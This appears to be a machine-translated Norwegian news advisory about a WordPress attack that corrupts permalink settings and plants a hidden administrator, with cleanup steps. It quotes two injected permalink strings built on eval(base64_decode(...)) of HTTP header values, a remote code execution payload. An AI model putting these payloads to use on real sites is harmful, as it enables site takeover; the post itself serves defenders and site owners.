WordPress SQL Injection - Siste Attack

WordPress SQL Injection - Siste Attack / Nyheter

Mange nettsteder blir rammet av et nylig SQL-angrep der koder blir injisert på nettstedet ditt. Denne MySQL-injeksjonen påvirker permalinkene dine ved å gjøre dem ineffektive. Som et resultat, vil bloggenes nettadresser ikke fungere. Tallrike WordPress-blogger ble angitt i dette angrepet, takk til Andy Soward for å bringe dette til vår oppmerksomhet.

Det var en av følgende koder som ble lagt til din permalink-struktur på grunn av dette angrepet:

% & ($ EVAL (base64_decode ($ _ SERVER [HTTP_REFERER])) |. +) &%

“/%&(%7B$%7Beval(base64_decode($_SERVER%5BHTTP_EXECCODE%5D))%7D%7D|.+)&%

Disse sitatene vedlagt alle permalink på nettstedet ditt, og det kan bare endres hvis det fjernes manuelt.

Å fikse dette går til:

Innstillinger> Permalinks og fjern koden ovenfor og erstatt standardkoden din.

Neste ting du trenger å gjøre er å gå til Brukere. Du vil se at det er flere enn en administrator. Du vil ikke se navnet sitt oppført, men du vil se tellingen økt. Så hva du trenger å gjøre er å se på alle brukere og finn den siste som registrerte. Sett musen over den brukeren og få linken. Endre koden userid = ved å legge til 1 til det nummeret. Så hvis den siste brukeren som du kan se var bruker # 2, legg deretter til 1 og gjør den 3. Du bør finne den skjulte adminen har en merkelig kode som et fornavn. Slett koden og gjør han til abonnent. Deretter returnerer og sletter han.

Dette bør løse problemet. Du kan også slette ham ved å bare gå til PHPMyAdmin. Fordi du vil se brukeren der.

Vi ville bare få denne nyheten ut så snart vi kan, slik at våre brukere kan bli oppdatert. Sørg for at du kontrollerer at bloggen din ikke er infisert. Vi håper at WordPress kommer ut med en utgivelse snart.

Også hvis du ikke har implementert noen av disse tiltakene for å sikre ditt WordPress Admin-område.